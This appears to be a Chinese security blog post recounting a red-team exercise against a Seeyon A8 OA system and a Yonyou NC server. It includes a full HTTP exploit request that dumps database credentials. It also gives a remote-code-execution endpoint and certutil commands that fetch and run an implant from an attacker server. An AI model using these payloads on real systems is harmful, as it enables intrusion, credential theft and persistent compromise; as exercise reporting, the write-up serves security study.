现在只对常读和星标的公众号才展示大图推送,建议大家能把威零安全实验室“设为星标”,否则可能就看不到了啦!
免责声明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
记录一下此次hvv遇到的站以及问题,前期拿到目标之后,第一时间没有做一下明确的分工和战术合作,还有一些没有找到目标单位资产站点的,到目前为止都是我比较感到惋惜的,还有一些是打点速度慢,在实战中经验缺乏,导致能打进去的点第一时间没有打进去,打进去之后发现别人已经光顾了一波了,其实这些问题也不是说找不到,重点是你的方法存在一定的问题,希望在后续的过程中能摸索出一个好的作方案吧!
这个致远OA我真的是看了好久,试了一些流行的poc和工具,可能拿站真的是需要运气,有的时候你需要多试试几个工具,否则你真的会与那个点失之交臂,最后只会留下无尽的悔恨。
在坐牢的时候看到一篇文章,致远A8+全版本存在数据库账号密码读取漏洞。
影响版本:
致远A8+(V7.0) SP1-SP3
于是进行测试一下,因为当时测试出它是有session泄露的问题的。通过session可以进后台,但是后续利用都被拦了,于是有了这次尝试。
使用poc
poc:
漏洞利用点为:/seeyon/officeservlet接口,当访问接口时 响应值为200且出现如下响应体时,基本可认定该漏洞存在
使用该poc进行验证,如图所示:
然后使用exp进行攻击
POST http://xxxxx/seeyon/officeservlet HTTP/1.1
Host: xxxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 350
DBSTEP V3.0 285 0 0
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi
如图所示,成功获取到了数据库的账号密码,但是还需要对其进行解密,使用工具对密文进行解密即可得到结果,如图所示:
然后想进行数据库连接,结果该站点没有对外开启3306端口,于是只能在内网进行利用,后面也在内网证明到了这个账号密码是正确的。解密工具放在后台了,获取方式:后台回复【解密】获取。
峰回路转
拿到了数据库密码不能连,那真是恨得牙痒痒啊,没办法只能剑走偏锋重新信息搜集,然后在一个落灰的文件夹里面发现一个工具,其中一个poc刚才没有试过,这就是为什么要多用几个工具或者使用所以poc进行测试的原因,于是使用这个点直接梭哈,如图所示:
PS:工具获取方式:后台回复【OA工具】进行获取。
终于进来了,我第一时间翻阅配置文件,找数据库相关信息,然后使用刚才获取到的账号密码进行验证,连接成功!这也验证了刚才获取到的数据是正确的。
然后用fscan直接对内网进行扫描,没有发现更多有用的东西,cs上线一下提升到system权限,浏览文件发现一个比较有趣的东西,管理员在桌面留了2个txt,如图所示:
哈哈哈哈哈,吓死了,嘶,赶紧跑了!(后面其实是没有什么了,不能横向,有别的队打进了的痕迹,于是赶紧写报告了)
0x02 某用友NC
在对全市目标搜集的过程中发现了一个用友NC的nday,访问如下接口 /servlet/~ic/bsh.servlet.BshServlet 执行命令,如图:
然后使用vps开启服务,进行远程下载并上传文件,再执行,中间碰了很多坑,恶心到我了,这里就不写了。
certutil.exe -urlcache -split -f http://0.0.0.0:8000/wechat.exe E:yonyouhomewechat.exe
执行exec("cmd /c dir&wechat.exe"); 成功上线。
或者可以这样一条命令:
certutil.exe -urlcache -split -f http://0.0.0.0:8000/wechat.exe E:yonyouhomewechat.exe & E:yonyouhomewechat.exe
然后在打完之后看了下该目标的其他站,发现了struts2漏洞,又得到了一个入口,要是早发现这个点也不用这样的麻烦了,如图:
打了半天用友,没在第一时间发现这个struts2,真的是浪费了很多时间!
https://mp.weixin.qq.com/s/nbnqAv6pKId1uzW3F2znJg
1、OA解密工具获取方式:后台回复【解密】
2、OA利用工具获取方式:后台回复【OA工具】
每日祝福
祝师傅们,天天高危、日日0day!!!!!!!!!!!!!!!
广告时刻
欢 迎 加 入 星 球 !
威零安全,星球永久开放,内容包括:实战报告+hvv红蓝资料+代码审计+免杀+渗透学习资源+各种资料文档+直播课短期一年,后续将开发自己的红队工具库供大家使用。有需要的可以添加后台微信联系本人。
或者翻到文章末尾添加机器人进群考察。
星球的最近主题和星球内部工具一些展示
PY交易
为了方便师傅们交流学习,我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例,更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书,小礼物等等,欢迎各位师傅进群交流
由于“威零安全交流群”群聊人数已满200人,扫码进不了的师傅可以添加机器人secbot回复“威零科技”即可加入群聊
原文始发于微信公众号(威零安全实验室):简单的地级hvv总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论